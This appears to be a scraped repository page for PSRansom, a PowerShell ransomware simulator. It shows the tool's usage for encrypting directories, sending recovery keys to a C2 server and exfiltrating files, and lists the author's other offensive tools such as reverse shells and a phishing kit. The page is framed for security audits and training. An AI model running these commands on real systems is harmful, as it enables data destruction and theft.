JoelGMSec/PSRansom JoelGMSec/PSRansom

  • Stars
    star
    439
  • Rank 99,247 (Top 2 %)
  • Language
    PowerShell
  • License
    GNU General Publi...
  • Created over 2 years ago
  • Updated 10 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
JoelGMSec/PSRansom
github

JoelGMSec

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PowerShell Ransomware Simulator with C2 Server

PSRansom

PSRansom

PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP.

All communication between the two elements is encrypted or encoded so as to be undetected by traffic inspection mechanisms, although at no time is HTTPS used at any time.

Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSRansom

Usage

.\PSRansom -h

  ____  ____  ____
 |  _ \/ ___||  _ \ __ _ _ __  ___  ___  _ __ ___
 | |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
 |  __/ ___) |  _ < (_| | | | \__ \ (_) | | | | | |
 |_|   |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|

  ----------------- by @JoelGMSec ----------------

 Info:  This tool helps you simulate encryption process of a
        generic ransomware in PowerShell with C2 capabilities

 Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
          Encrypt all files & sends recovery key to C2Server
          Use -x to exfiltrate and decrypt files on C2Server

        .\PSRansom.ps1 -d Directory -k RecoveryKey
          Decrypt all files with recovery key string

 Warning: All info will be sent to the C2Server without any encryption
          You need previously generated recovery key to retrieve files

The detailed guide of use can be found at the following link:

https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.

Support

You can support my work buying me a coffee:

buymeacoffe

More Repositories

1

AutoRDPwn

The Shadow Attack Framework
PowerShell
1,039
star
2

EvilnoVNC

Ready to go Phishing Platform
JavaScript
706
star
3

Invoke-Stealth

Simple & Powerful PowerShell Script Obfuscator
PowerShell
392
star
4

Cloudtopolis

Zero Infrastructure Password Cracking
PowerShell
377
star
5

PyShell

Multiplatform Python WebShell
Python
287
star
6

HTTP-Shell

MultiPlatform HTTP Reverse Shell
PowerShell
213
star
7

PSAsyncShell

PowerShell Asynchronous TCP Reverse Shell
PowerShell
149
star
8

Invoke-DNSteal

Simple & Customizable DNS Data Exfiltrator
PowerShell
105
star
9

LeakSearch

Search & Parse Password Leaks
Python
104
star
10

FakeDataGen

Full Valid Fake Data Generator
Python
82
star
11

AzureGraph

Azure AD enumeration over MS Graph
PowerShell
78
star
12

Invoke-Transfer

PowerShell Clipboard Data Transfer
PowerShell
68
star
13

Thunderstorm

Modular framework to exploit UPS devices
Python
61
star
14

PowerGram

Multiplatform Telegram Bot in pure PowerShell
PowerShell
47
star
15

Darkbyte

Repository of tools used in my blog
C
46
star
16

MyTalks

Collection of my talks and workshops about hacking & cybersecurity
23
star
17

AutoRDPnw

The Shadow Attack Framework
8
star
18

Evil-IRC

Old School IRC Backdoor
Perl
3
star
19

JoelGMSec

https://darkbyte.net/aboutme
3
star